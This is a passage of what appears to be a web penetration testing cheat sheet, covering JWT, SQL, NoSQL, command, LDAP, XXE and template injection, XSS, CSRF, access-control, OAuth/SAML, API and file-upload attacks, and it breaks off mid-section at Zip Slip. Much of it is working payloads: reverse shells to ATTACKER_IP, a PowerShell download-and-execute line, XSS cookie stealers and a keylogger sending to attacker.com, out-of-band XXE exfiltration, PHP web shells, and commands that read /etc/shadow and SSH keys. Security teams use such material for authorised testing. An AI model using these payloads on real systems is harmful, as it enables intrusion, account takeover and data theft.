python3 jwt_tool.py eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9...

# Manual decode (base64)
echo "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9" | base64 -d
# Output: {"alg":"HS256","typ":"JWT"}

echo "eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ" | base64 -d
# Output: {"sub":"1234567890","name":"John Doe","iat":1516239022}

Common JWT vulnerabilities:

# 1. Algorithm confusion (HS256 → None)
# Original header:
{"alg":"HS256","typ":"JWT"}

# Modified header:
{"alg":"none","typ":"JWT"}

# Modified token (no signature):
eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.eyJzdWIiOiIxMjM0IiwibmFtZSI6ImFkbWluIiwiaXNfYWRtaW4iOnRydWV9.

# 2. Algorithm confusion (RS256 → HS256)
# Server expects RS256 (asymmetric)
# Send HS256 (symmetric) signed with public key

# 3. Weak secret brute-force
hashcat -a 0 -m 16500 jwt.txt /usr/share/wordlists/rockyou.txt

# 4. Modify claims
# Original:
{"sub":"1234","name":"user","is_admin":false}

# Modified:
{"sub":"1234","name":"user","is_admin":true}

# Re-sign with cracked/weak secret

jwt_tool automated testing:

# All vulnerability scans
python3 jwt_tool.py <JWT> -M at -t "http://target.com/api/data"

# Specific tests:
# -X a : Algorithm confusion
# -X i : Inject new claims
# -X s : JWKS spoofing

---

Injection Attacks

SQL Injection

Detection (manual):

# 1. Single quote test
curl "http://target.com/product?id=1'"
# Error message indicates SQLi vulnerability:
# "You have an error in your SQL syntax..."

# 2. Boolean-based test
curl "http://target.com/product?id=1 AND 1=1"  # Should work normally
curl "http://target.com/product?id=1 AND 1=2"  # Should return different result

# 3. Time-based blind SQLi
curl "http://target.com/product?id=1 AND SLEEP(5)"
# If response takes 5+ seconds = vulnerable

# 4. Union-based SQLi
curl "http://target.com/product?id=1 UNION SELECT NULL,NULL,NULL--"
# Adjust number of NULLs until no error

curl "http://target.com/product?id=1 UNION SELECT 1,2,3--"
# Numbers appear in response = injection point

curl "http://target.com/product?id=1 UNION SELECT 1,database(),user()--"
# Extract database name and current user

sqlmap (automated SQLi exploitation):

# Basic scan
sqlmap -u "http://target.com/product?id=1"

# Specify parameter to test
sqlmap -u "http://target.com/search" --data "q=test" -p q

# Cookie-based SQLi
sqlmap -u "http://target.com/dashboard" --cookie="session=abc123" --level=2

# POST request with SQLi
sqlmap -u "http://target.com/login" --data="username=admin&password=test" -p username

# Aggressive testing (risk=3, level=5)
sqlmap -u "http://target.com/product?id=1" --risk=3 --level=5 --batch

# Extract database names
sqlmap -u "http://target.com/product?id=1" --dbs

# Extract tables from specific database
sqlmap -u "http://target.com/product?id=1" -D webapp --tables

# Extract columns from specific table
sqlmap -u "http://target.com/product?id=1" -D webapp -T users --columns

# Dump table data
sqlmap -u "http://target.com/product?id=1" -D webapp -T users --dump

# Full database dump
sqlmap -u "http://target.com/product?id=1" --dump-all --batch

# OS shell (if database user has FILE privileges)
sqlmap -u "http://target.com/product?id=1" --os-shell

# Read file from server
sqlmap -u "http://target.com/product?id=1" --file-read="/etc/passwd"

# Write file to server
sqlmap -u "http://target.com/product?id=1" --file-write="shell.php" --file-dest="/var/www/html/shell.php"

Manual exploitation examples:

-- MySQL injection payloads:

-- Enumerate databases
1' UNION SELECT 1,schema_name,3 FROM information_schema.schemata--

-- Enumerate tables
1' UNION SELECT 1,table_name,3 FROM information_schema.tables WHERE table_schema='webapp'--

-- Enumerate columns
1' UNION SELECT 1,column_name,3 FROM information_schema.columns WHERE table_name='users'--

-- Extract data
1' UNION SELECT 1,CONCAT(username,':',password),3 FROM users--

-- Read file (requires FILE privilege)
1' UNION SELECT 1,LOAD_FILE('/etc/passwd'),3--

-- Write file (requires FILE privilege)
1' UNION SELECT 1,'<?php system($_GET["cmd"]); ?>',3 INTO OUTFILE '/var/www/html/shell.php'--

-- PostgreSQL specific:
1'; SELECT version()--
1'; SELECT current_database()--

-- MSSQL specific:
1'; SELECT @@version--
1'; EXEC xp_cmdshell 'whoami'--

-- Oracle specific:
1' UNION SELECT NULL,banner,NULL FROM v$version--

Bypass WAF/filters:

# URL encoding
id=1%27%20OR%201=1--

# Double URL encoding
id=1%2527%2520OR%25201=1--

# Case variation
id=1' Or 1=1--
id=1' oR 1=1--

# Comment injection
id=1'/**/OR/**/1=1--

# Whitespace variations
id=1' OR 1=1--
id=1'OR'1'='1
id=1'%09OR%091=1--  (tab character)

# Inline comments
id=1'/*!OR*/1=1--
id=1'/*! OR */1=1--

# String concatenation
id=1' OR 'a'='a
id=CHAR(49) OR 1=1--

NoSQL Injection

MongoDB injection:

# Authentication bypass
curl -X POST http://target.com/login \
    -H "Content-Type: application/json" \
    -d '{"username":{"$ne":null},"password":{"$ne":null}}'

# $ne = not equal (bypasses authentication)

# Extract data using regex
curl -X POST http://target.com/login \
    -d "username[$regex]=^admin&password[$ne]=null"

# Boolean-based enumeration
curl -X POST http://target.com/login \
    -d "username=admin&password[$regex]=^a"  # Check if password starts with 'a'

# JavaScript injection
curl -X POST http://target.com/search \
    -d "query='; return true; var dummy='"

Testing methodology:

# 1. Test for NoSQL injection in login
{"username":"admin","password":{"$gt":""}}  # $gt = greater than (always true)

# 2. Test in search functionality
{"search":{"$where":"this.name == 'test'"}}

# 3. Test in user enumeration
{"username":{"$regex":"^admin"},"password":"anything"}

Command Injection (OS Command Injection)

Detection:

# Test for command injection with sleep
curl "http://target.com/ping?host=127.0.0.1; sleep 10"
# If response takes 10+ seconds = vulnerable

# Test for command injection with output
curl "http://target.com/ping?host=127.0.0.1; whoami"
# If response contains username = vulnerable

Common injection points:

# Ping utility
host=127.0.0.1; cat /etc/passwd
host=127.0.0.1 | whoami
host=127.0.0.1 && id
host=`whoami`
host=$(whoami)

# File operations
filename=test.txt; cat /etc/passwd
filename=test.txt | ls -la

# ImageMagick convert
convert=input.jpg; cat /etc/passwd; output.png

Exploitation payloads:

# Linux command injection:
; cat /etc/passwd
; cat /etc/shadow
; cat ~/.ssh/id_rsa
; ls -la /var/www/html
; uname -a
; whoami
; id
; pwd

# Reverse shell (Linux)
; bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1
; nc ATTACKER_IP 4444 -e /bin/bash
; python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("ATTACKER_IP",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

# Windows command injection:
; whoami
; ipconfig
; type C:\Windows\win.ini
; net user
; net localgroup administrators

# Windows reverse shell
; powershell -NoP -NonI -W Hidden -Exec Bypass -Command "IEX (New-Object Net.WebClient).DownloadString('http://ATTACKER_IP/shell.ps1')"

Bypass filters:

# Whitespace filtering bypass
cat</etc/passwd
cat<>file
{cat,/etc/passwd}

# Blacklist bypass
c''at /etc/passwd
c\at /etc/passwd
c$@at /etc/passwd

# Use wildcards
cat /etc/pass??
cat /etc/*ss*d

# Encoding bypass
echo "Y2F0IC9ldGMvcGFzc3dk" | base64 -d | bash  # base64 decode "cat /etc/passwd"

LDAP Injection

Authentication bypass:

# Normal LDAP query:
(&(uid=username)(password=userpass))

# Injection payload:
username: admin)(&)
password: anything

# Resulting query:
(&(uid=admin)(&))(password=anything))
# Always returns admin user

LDAP injection payloads:

# Authentication bypass
*
*)(&
*)(uid=*)(&
admin)(&

# Extract data
*)(uid=*))%00
*)(|(uid=*

# Blind LDAP injection
admin)(&(objectClass=*
admin)(&(uid=a*

XML External Entity (XXE) Injection

Basic XXE payload:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<data>
  <username>&xxe;</username>
</data>

Testing methodology:

# 1. Submit XML with entity reference
curl -X POST http://target.com/api/upload \
    -H "Content-Type: application/xml" \
    -d '<?xml version="1.0"?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<data><username>&xxe;</username></data>'

# 2. Check response for /etc/passwd content

Advanced XXE payloads:

<!-- Read internal files -->
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>

<!-- SSRF via XXE -->
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://internal-server/admin">]>

<!-- Out-of-band XXE (if no direct output) -->
<!DOCTYPE foo [
  <!ENTITY % file SYSTEM "file:///etc/passwd">
  <!ENTITY % dtd SYSTEM "http://attacker.com/evil.dtd">
  %dtd;
  %send;
]>

<!-- evil.dtd on attacker server: -->
<!ENTITY % all "<!ENTITY send SYSTEM 'http://attacker.com/?data=%file;'>">
%all;

<!-- PHP wrapper for base64 encoding -->
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">]>

<!-- Read Windows files -->
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///c:/windows/win.ini">]>

Server-Side Template Injection (SSTI)

Detection:

# Test for template injection
# Jinja2/Flask:
{{7*7}}  # Should output 49 if vulnerable

# Twig:
{{7*'7'}}  # Should output 7777777 if vulnerable

# FreeMarker:
${7*7}  # Should output 49 if vulnerable

Exploitation payloads:

# Jinja2 (Flask) RCE:
{{ config.items() }}  # Enumerate config

{{ ''.__class__.__mro__[1].__subclasses__() }}  # List all classes

# Execute commands — DO NOT hardcode the subclass index. The position of `subprocess.Popen`
# in __subclasses__() varies by Python version, loaded modules, and import order. Find it
# dynamically instead:
{{ ''.__class__.__mro__[1].__subclasses__()|map(attribute='__name__')|list }}
# Then locate the index of 'Popen' in the printed list, OR use a generator filter:
{{ namespace(x=ns)|attr('x')|attr('__init__')|attr('__globals__')|attr('__getitem__')('os')|attr('popen')('id')|attr('read')() }}

# Most reliable Flask payload (works without subclass arithmetic):
{{ request.application.__globals__.__builtins__.__import__('os').popen('id').read() }}

# Modern Jinja2 sandbox-bypass primitive (works against many filter blocklists):
{{ cycler.__init__.__globals__.os.popen('id').read() }}
{{ lipsum.__globals__['os'].popen('id').read() }}

// FreeMarker RCE:
<#assign ex="freemarker.template.utility.Execute"?new()>
${ex("cat /etc/passwd")}

// Thymeleaf:
${T(java.lang.Runtime).getRuntime().exec('cat /etc/passwd')}

---

Cross-Site Scripting (XSS)

Reflected XSS

Detection:

# Basic test
curl "http://target.com/search?q=<script>alert(1)</script>"

# Check if payload appears in response
curl -s "http://target.com/search?q=UNIQUE12345" | grep "UNIQUE12345"
# If found = potential XSS if not properly encoded

Common payloads:

<!-- Basic alert -->
<script>alert('XSS')</script>

<!-- Image tag -->
<img src=x onerror=alert('XSS')>

<!-- SVG -->
<svg onload=alert('XSS')>

<!-- Body tag -->
<body onload=alert('XSS')>

<!-- Input tag -->
<input onfocus=alert('XSS') autofocus>

<!-- Markdown XSS -->
[Click me](javascript:alert('XSS'))

<!-- Event handlers -->
<div onmouseover="alert('XSS')">Hover me</div>

<!-- Data URI -->
<a href="data:text/html,<script>alert('XSS')</script>">Click</a>

Advanced XSS payloads:

<!-- Bypass filters -->
<script>alert(String.fromCharCode(88,83,83))</script>  <!-- alert('XSS') -->

<img src=x onerror="&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;">  <!-- HTML entity encoding -->

<img src=x onerror="\u0061\u006c\u0065\u0072\u0074('XSS')">  <!-- Unicode escape -->

<!-- Without quotes -->
<script>alert(document.domain)</script>

<!-- Without parentheses (ES6) -->
<script>onerror=alert;throw 1</script>

<!-- Bypass uppercase filter -->
<ScRiPt>alert('XSS')</sCrIpT>

<!-- Polyglot payload (works in multiple contexts) -->
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e

XSS for cookie stealing:

<script>
fetch('http://attacker.com/steal?cookie=' + document.cookie);
</script>

<!-- Alternative: -->
<img src=x onerror="this.src='http://attacker.com/steal?c='+document.cookie">

<!-- Using XMLHttpRequest: -->
<script>
var xhr = new XMLHttpRequest();
xhr.open('GET', 'http://attacker.com/steal?cookie=' + btoa(document.cookie), true);
xhr.send();
</script>

Stored XSS

Testing methodology:

# 1. Submit payload via POST request
curl -X POST http://target.com/comments \
    -d "comment=<script>alert('Stored XSS')</script>"

# 2. Visit page where comment is displayed
curl http://target.com/comments/123

# 3. Check if script executes

High-impact stored XSS payloads:

<!-- BeEF (Browser Exploitation Framework) hook -->
<script src="http://attacker.com:3000/hook.js"></script>

<!-- Session hijacking -->
<script>
new Image().src='http://attacker.com/steal.php?cookie='+document.cookie;
</script>

<!-- Keylogger -->
<script>
document.onkeypress = function(e) {
    fetch('http://attacker.com/log?key=' + String.fromCharCode(e.which));
}
</script>

<!-- Defacement -->
<script>
document.body.innerHTML = '<h1>Hacked by Attacker</h1>';
</script>

<!-- Admin account creation -->
<script>
fetch('/admin/create-user', {
    method: 'POST',
    headers: {'Content-Type': 'application/json'},
    body: JSON.stringify({username: 'hacker', password: 'password123', role: 'admin'})
});
</script>

DOM-based XSS

Detection:

# Check for DOM sinks in JavaScript
curl -s http://target.com/app.js | grep -E "innerHTML|outerHTML|document.write|eval"

# Test URL fragment
http://target.com/page#<img src=x onerror=alert('DOM XSS')>

Common DOM sinks:

// Vulnerable code examples:

// innerHTML
document.getElementById('output').innerHTML = location.hash.substring(1);
// Exploit: http://target.com/page#<img src=x onerror=alert(1)>

// eval
eval(location.hash.substring(1));
// Exploit: http://target.com/page#alert(1)

// document.write
document.write(decodeURIComponent(location.search.substring(1)));
// Exploit: http://target.com/page?<script>alert(1)</script>

// setTimeout/setInterval
setTimeout(location.hash.substring(1), 1000);
// Exploit: http://target.com/page#alert(1)

// jQuery html()
$('#output').html(location.hash.substring(1));
// Exploit: http://target.com/page#<img src=x onerror=alert(1)>

XSS Bypass Techniques

<!-- Bypass tag blacklist -->
<img src=x onerror=alert(1)>
<svg onload=alert(1)>
<iframe onload=alert(1)>
<body onload=alert(1)>
<input onfocus=alert(1) autofocus>
<select onfocus=alert(1) autofocus>
<textarea onfocus=alert(1) autofocus>
<marquee onstart=alert(1)>
<details open ontoggle=alert(1)>

<!-- Bypass keyword blacklist (alert, script) -->
<img src=x onerror=confirm(1)>
<img src=x onerror=prompt(1)>
<img src=x onerror=self['ale'+'rt'](1)>
<img src=x onerror=top['ale'+'rt'](1)>
<img src=x onerror=eval('ale'+'rt(1)')>

<!-- Bypass parentheses filter -->
<script>onerror=alert;throw 1</script>
<script>import('data:text/javascript,alert(1)')</script>

<!-- Bypass without space -->
<img/src=x/onerror=alert(1)>
<svg/onload=alert(1)>

<!-- Case variation -->
<ScRiPt>alert(1)</ScRiPt>
<IMG SRC=x ONERROR=alert(1)>

<!-- Null bytes -->
<scri%00pt>alert(1)</scri%00pt>

<!-- HTML encoding -->
&#60;script&#62;alert(1)&#60;/script&#62;

<!-- URL encoding -->
%3Cscript%3Ealert(1)%3C/script%3E

XSS Automation

# Dalfox (fast XSS scanner)
dalfox url http://target.com/search?q=test

# XSStrike
python3 xsstrike.py -u "http://target.com/search?q=test"

# Nuclei with XSS templates
nuclei -u http://target.com -t ~/nuclei-templates/cves/ -t ~/nuclei-templates/vulnerabilities/xss/

# Burp Suite Scanner (Professional)
# 1. Send request to Scanner
# 2. Right-click → Scan → XSS

---

Cross-Site Request Forgery (CSRF)

CSRF Detection

Check for CSRF protection:

# 1. Inspect form for CSRF token
curl -s http://target.com/settings | grep -i "csrf"

# Secure example:
# <input type="hidden" name="csrf_token" value="a1b2c3d4e5f6...">

# 2. Test without token
curl -X POST http://target.com/settings \
    -b "session=xyz" \
    -d "email=attacker@evil.com"

# Expected (secure): 403 Forbidden or "Invalid CSRF token"
# Vulnerable: 200 OK (email changed)

# 3. Test with invalid token
curl -X POST http://target.com/settings \
    -b "session=xyz" \
    -d "email=attacker@evil.com&csrf_token=invalid"

# Should reject request

CSRF Exploitation

Basic CSRF POC (Proof of Concept):

<!-- csrf_poc.html -->
<!DOCTYPE html>
<html>
<head><title>CSRF POC</title></head>
<body>
  <h1>Click anywhere to continue</h1>
  <form id="csrf-form" action="http://target.com/settings" method="POST">
    <input type="hidden" name="email" value="attacker@evil.com">
    <input type="hidden" name="password" value="hacked123">
  </form>
  <script>
    document.getElementById('csrf-form').submit();
  </script>
</body>
</html>

Advanced CSRF techniques:

<!-- Auto-submit with XMLHttpRequest (bypasses referrer check if misconfigured) -->
<script>
var xhr = new XMLHttpRequest();
xhr.open('POST', 'http://target.com/settings', true);
xhr.withCredentials = true;  // Send cookies
xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
xhr.send('email=attacker@evil.com');
</script>

<!-- Using fetch API -->
<script>
fetch('http://target.com/settings', {
    method: 'POST',
    credentials: 'include',  // Send cookies
    headers: {'Content-Type': 'application/x-www-form-urlencoded'},
    body: 'email=attacker@evil.com'
});
</script>

<!-- Image-based CSRF (GET request) -->
<img src="http://target.com/delete-account?confirm=yes">

<!-- JSON CSRF -->
<script>
var xhr = new XMLHttpRequest();
xhr.open('POST', 'http://target.com/api/transfer', true);
xhr.withCredentials = true;
xhr.setRequestHeader('Content-Type', 'application/json');
xhr.send(JSON.stringify({to: 'attacker', amount: 10000}));
</script>

CSRF Protection Bypass

Bypass weak CSRF token validation:

# 1. Token not tied to user session
# User A's token: csrf_abc123
# User B's token: csrf_xyz789

# User A can use User B's token successfully (vulnerable)

# 2. Token validation only when token is present
curl -X POST http://target.com/settings \
    -b "session=xyz" \
    -d "email=attacker@evil.com"
# No csrf_token parameter = bypassed

# 3. Referer header check bypass
# Use <meta name="referrer" content="no-referrer"> to suppress referer

# 4. Method bypass (POST → GET)
# If application accepts both methods:
<img src="http://target.com/delete-account?confirm=yes&csrf_token=stolen">

---

Access Control & Authorization

Insecure Direct Object Reference (IDOR)

Testing methodology:

# 1. Sequential ID enumeration
curl http://target.com/api/invoice/1001 -H "Authorization: Bearer USER_A_TOKEN"
curl http://target.com/api/invoice/1002 -H "Authorization: Bearer USER_A_TOKEN"  # Try to access user B's invoice

# 2. Parameter pollution
curl "http://target.com/api/user/123?user_id=124"  # Try to override user_id

# 3. Body parameter modification
curl -X POST http://target.com/api/order \
    -H "Authorization: Bearer USER_A_TOKEN" \
    -d '{"order_id": 999, "user_id": 124}'  # Try to modify another user's order

# 4. UUID/GUID enumeration
curl http://target.com/api/document/f47ac10b-58cc-4372-a567-0e02b2c3d479
# Even if IDs are UUIDs, test if authorization is enforced

Burp Suite - Autorize extension for IDOR:

1. Install Autorize extension
2. Set low-privilege user's session token
3. Browse application as high-privilege user
4. Review Autorize tab for unauthorized access

Horizontal Privilege Escalation

User A accessing User B's resources:

# Profile viewing
curl http://target.com/profile/userB -H "Cookie: session=userA_session"
# Expected: 403 Forbidden
# Vulnerable: 200 OK with userB's profile

# Message reading
curl http://target.com/messages/456 -H "Cookie: session=userA_session"
# Message 456 belongs to userB

# Order manipulation
curl -X POST http://target.com/api/cancel-order \
    -H "Cookie: session=userA_session" \
    -d "order_id=789"  # Order 789 belongs to userB

Vertical Privilege Escalation

Standard user accessing admin functions:

# Admin panel access
curl http://target.com/admin -H "Cookie: session=standard_user"

# Admin API endpoints
curl http://target.com/api/admin/users -H "Cookie: session=standard_user"

# Parameter-based role escalation
curl -X POST http://target.com/api/user/update \
    -H "Cookie: session=standard_user" \
    -d '{"user_id": 123, "role": "admin"}'

# Hidden admin functions
curl -X POST http://target.com/api/create-admin-user \
    -H "Cookie: session=standard_user" \
    -d '{"username": "hacker", "password": "pass123"}'

Mass Assignment Vulnerability

Concept: Application blindly binds all user input to object properties.

# Normal user registration:
POST /api/register HTTP/1.1
Content-Type: application/json

{
    "username": "newuser",
    "email": "user@example.com",
    "password": "password123"
}

# Mass assignment attack (add admin field):
{
    "username": "hacker",
    "email": "hacker@evil.com",
    "password": "password123",
    "is_admin": true,
    "role": "administrator",
    "verified": true,
    "credits": 999999
}

# If vulnerable, user is created with admin privileges

Testing approach:

# 1. Identify object properties by viewing API responses
curl http://target.com/api/user/123
# Response shows: {"id":123,"username":"test","is_admin":false,"credits":100}

# 2. Try to modify restricted properties
curl -X POST http://target.com/api/user/update \
    -d '{"username":"test","is_admin":true,"credits":999999}'

# 3. Check if changes persisted
curl http://target.com/api/user/123

---

API Security Testing

REST API Enumeration

# Common API endpoints
/api/v1/users
/api/v1/auth/login
/api/v1/auth/register
/api/v2/products
/api/admin/config
/api/docs
/api/swagger
/api/graphql

# API documentation paths
/swagger.json
/swagger.yaml
/openapi.json
/api/swagger-ui.html
/api-docs
/docs
/redoc

# Download API documentation
curl http://target.com/swagger.json | jq . > api_spec.json

# Kiterunner (API endpoint discovery)
kr scan target.com -w ~/api-wordlist.txt

API Authentication Testing

JWT testing:

# See JWT section above for detailed testing

# Quick checks:
# 1. Decode JWT
echo "eyJhbGc..." | cut -d'.' -f2 | base64 -d | jq .

# 2. Test without signature
# Remove signature portion and test

# 3. Test expired token
# Wait for token expiration and reuse

API key testing:

# API key in URL (insecure)
curl "http://target.com/api/data?api_key=abc123"

# API key in header (better)
curl http://target.com/api/data -H "X-API-Key: abc123"

# Test weak API key
for key in {000000..999999}; do
    curl -s http://target.com/api/data -H "X-API-Key: $key" | grep -q "error" || echo "Valid key: $key"
done

# Test API key reuse
# User A's key: abc123
# Try using User A's key to access User B's data
curl http://target.com/api/user/userB/data -H "X-API-Key: abc123"

OAuth 2.0 / OIDC / SAML Testing

Scope: modern federated-auth flows are now the dominant authentication surface for SaaS apps, B2B integrations, and mobile/SPA clients. Most exploitable bugs cluster around redirect-URI validation, state/nonce handling, token-type confusion, and trust between IdP and SP.

OAuth 2.0 / OIDC — high-value test cases:

# 1. redirect_uri validation — substring vs exact match
# Original (legitimate):
https://idp.example.com/oauth/authorize?client_id=abc&redirect_uri=https://app.example.com/callback&response_type=code&scope=openid&state=xyz

# Test variants — any successful redirect to an attacker-controlled host = critical:
redirect_uri=https://app.example.com.attacker.com/callback        # suffix match bug
redirect_uri=https://app.example.com@attacker.com/callback        # userinfo-prefix bug
redirect_uri=https://app.example.com/callback/../../attacker      # path traversal in validator
redirect_uri=https://app.example.com/callback#@attacker.com       # fragment confusion
redirect_uri=https://app.example.com/callback?next=//attacker.com # open-redirect chain inside the SP
redirect_uri=https://app.example.com:443@attacker.com/callback    # port confusion
redirect_uri=//attacker.com/callback                              # protocol-relative

# 2. state parameter — CSRF on the callback
# Authorize WITHOUT state: confirm the SP still accepts the callback (vulnerable to login CSRF / account takeover).
# Authorize WITH attacker's state: confirm SP binds state to victim's session (rejected = secure).

# 3. nonce (OIDC) — replay protection on the id_token
# Reuse an id_token issued for a different nonce: SP must reject (nonce mismatch).

# 4. PKCE downgrade
# For public clients (mobile/SPA), confirm code_challenge/code_verifier is required.
# Submit /token without code_verifier — should fail. If it succeeds, PKCE is advisory only.

# 5. response_mode=form_post → fragment downgrade (smuggle code via Referer header)

# 6. Implicit-flow leakage via Referer (deprecated flow; if still enabled, treat as finding).

# 7. Scope upgrade on /token refresh
curl -X POST https://idp.example.com/oauth/token \
  -d "grant_type=refresh_token&refresh_token=$RT&scope=openid+admin"
# RFC 6749 §6: refresh MUST NOT grant broader scope than original. Test it.

# 8. id_token validation — alg confusion / kid traversal / JWKS bypass
# See JWT section. OIDC id_tokens are signed JWTs; the SP fetches signing keys from the IdP's
# /.well-known/openid-configuration → jwks_uri. If jwks_uri is configurable/cached weakly,
# attempt JWKS spoofing (jwt_tool -X s).

# 9. Token-type confusion
# Send an access_token where an id_token is expected (or vice versa). Many SPs accept either
# blindly because both are JWTs.

# 10. Discovery endpoint abuse
curl https://idp.example.com/.well-known/openid-configuration
# Look for: weak issuer URL validation, mutable jwks_uri, dynamic client registration enabled
# (RFC 7591) without auth — register attacker client and pivot.

SAML — high-value test cases:

<!-- 1. XML Signature Wrapping (XSW) — duplicate the signed Assertion above the unsigned one.
     SP validates signature on the original; consumes attributes from the injected one.
     Classic primitive; still hits older Java/.NET SP libraries [verify 2026-04-25]. -->

<!-- 2. Comment-injection in NameID (CVE-2017-11427 / CVE-2018-0114 family)
     <NameID>victim@example.com<!-- attacker-injected-->@attacker.com</NameID>
     Some XML parsers pre-canonicalization split on the comment, granting auth as victim. -->

<!-- 3. xmlns confusion — redefine the SAML namespace mid-document. -->

<!-- 4. Signature stripping — remove <ds:Signature>, send unsigned Assertion.
     SP MUST require a signature on Response or Assertion. Test both. -->

<!-- 5. XXE in Assertion — submit a SAMLResponse with a DOCTYPE. -->

Tooling:

Tool	Purpose
jwt_tool	OIDC id_token / access_token attacks (alg confusion, kid traversal, JWKS spoof)
Burp Suite — JWT Editor / SAML Raider	Manual JWT/SAML manipulation in-flight
oauthtoolkit / oauth-tester	OAuth-flow fuzzers [verify 2026-04-25]
pyoidc	Build custom OIDC clients for negative testing
Burp Suite — EsPReSSO	OAuth/OIDC/SAML/JWT all-in-one extension

References (canonical): RFC 6749 (OAuth 2.0), RFC 7636 (PKCE), RFC 8252 (Native Apps BCP), OpenID Connect Core 1.0, OASIS SAML 2.0 Core, OWASP ASVS v4.0 §3 (Session) / §6 (Crypto) / §7 (Errors). For deeper dives: PortSwigger OAuth labs, Daniel Fett's "OAuth 2.0 Security Best Current Practice" (RFC 9700).

---

GraphQL Testing

Introspection query:

curl -X POST http://target.com/graphql \
    -H "Content-Type: application/json" \
    -d '{"query":"{\n  __schema {\n    types {\n      name\n      fields {\n        name\n      }\n    }\n  }\n}"}'

# Visualize schema with GraphQL Voyager:
# https://graphql-kit.com/graphql-voyager/

Common GraphQL attacks:

# Introspection (if enabled)
{
  __schema {
    queryType {
      fields {
        name
        description
      }
    }
  }
}

# IDOR in GraphQL
{
  user(id: 124) {
    email
    password_hash
    credit_card
  }
}

# Batch queries (DoS)
{
  user1: user(id: 1) { name }
  user2: user(id: 2) { name }
  user3: user(id: 3) { name }
  ...
  user10000: user(id: 10000) { name }
}

# Nested queries (DoS)
{
  users {
    posts {
      comments {
        author {
          posts {
            comments {
              author {
                name
              }
            }
          }
        }
      }
    }
  }
}

API Rate Limiting Testing

# Test for rate limiting
for i in {1..1000}; do
    curl -s http://target.com/api/search?q=test &
done

# Expected: 429 Too Many Requests after ~100 requests
# Vulnerable: All 1000 requests succeed

# Check response headers
curl -I http://target.com/api/search?q=test

# Rate limit headers (good):
# X-RateLimit-Limit: 100
# X-RateLimit-Remaining: 99
# X-RateLimit-Reset: 1634567890

API Versioning Issues

# Test older API versions
curl http://target.com/api/v1/users  # Older version, may have vulnerabilities
curl http://target.com/api/v2/users  # Newer version, may have fixes

# Check for version-specific bypasses
# v2 requires authentication, v1 doesn't:
curl http://target.com/api/v1/admin/users  # May bypass auth

---

File Upload Vulnerabilities

Unrestricted File Upload

Testing methodology:

# 1. Upload legitimate file
curl -F "file=@test.jpg" http://target.com/upload

# 2. Upload PHP shell
curl -F "file=@shell.php" http://target.com/upload

# 3. Access uploaded file
curl http://target.com/uploads/shell.php?cmd=whoami

Basic PHP web shell:

<?php
// shell.php
system($_GET['cmd']);
?>

<!-- Usage: -->
<!-- http://target.com/uploads/shell.php?cmd=ls -->

More sophisticated shell:

<?php
// shell2.php
if(isset($_REQUEST['cmd'])){
    echo "<pre>";
    $cmd = ($_REQUEST['cmd']);
    system($cmd);
    echo "</pre>";
    die;
}
?>

<form method="POST">
    Command: <input type="text" name="cmd">
    <input type="submit" value="Execute">
</form>

Bypass File Extension Filters

# 1. Null byte injection (older PHP)
curl -F "file=@shell.php%00.jpg" http://target.com/upload

# 2. Double extension
curl -F "file=@shell.php.jpg" http://target.com/upload

# 3. Case variation
curl -F "file=@shell.PhP" http://target.com/upload
curl -F "file=@shell.pHp" http://target.com/upload

# 4. Alternative extensions
shell.php5
shell.phtml
shell.phar
shell.asp
shell.aspx
shell.jsp
shell.jspx

# 5. Add valid extension at end
curl -F "file=@shell.php.png" http://target.com/upload
# Then rename or use path traversal

Bypass Content-Type Validation

# Change Content-Type header
curl -F "file=@shell.php;type=image/jpeg" http://target.com/upload

# Burp Suite:
POST /upload HTTP/1.1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary

------WebKitFormBoundary
Content-Disposition: form-data; name="file"; filename="shell.php"
Content-Type: image/jpeg  <!-- Fake content type -->

<?php system($_GET['cmd']); ?>
------WebKitFormBoundary--

Magic Byte (File Signature) Bypass

# Add JPEG magic bytes to PHP shell
echo -e '\xFF\xD8\xFF\xE0\n<?php system($_GET["cmd"]); ?>' > shell.php.jpg

# Add PNG magic bytes
echo -e '\x89PNG\r\n\x1a\n\n<?php system($_GET["cmd"]); ?>' > shell.php.png

# Add GIF magic bytes
echo -e 'GIF89a\n<?php system($_GET["cmd"]); ?>' > shell.php.gif

Path Traversal in File Upload

# Upload file to arbitrary location
curl -F "file=@shell.php" -F "path=../../../../../../var/www/html/" http://target.com/upload

# Filename with path traversal
curl -F "file=@shell.php;filename=../../../shell.php" http://target.com/upload

# Windows path traversal
curl -F "file=@shell.php;filename=..\..\..\..\inetpub\wwwroot\shell.php" http://target.com/upload

XXE via File Upload

<!-- malicious.svg -->
<?xml version="1.0" standalone="yes"?>
<!DOCTYPE test [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<svg width="128px" height="128px" xmlns="http://www.w3.org/2000/svg">
  <text font-size="16" x="0" y="16">&xxe;</text>
</svg>

# Upload malicious SVG
curl -F "file=@malicious.svg" http://target.com/upload

# Access uploaded file
curl http://target.com/uploads/malicious.svg
# Should display /etc/passwd content

ZIP File Upload Vulnerabilities

Zip Slip (path traversal):

# Create malicious zip with path traversal
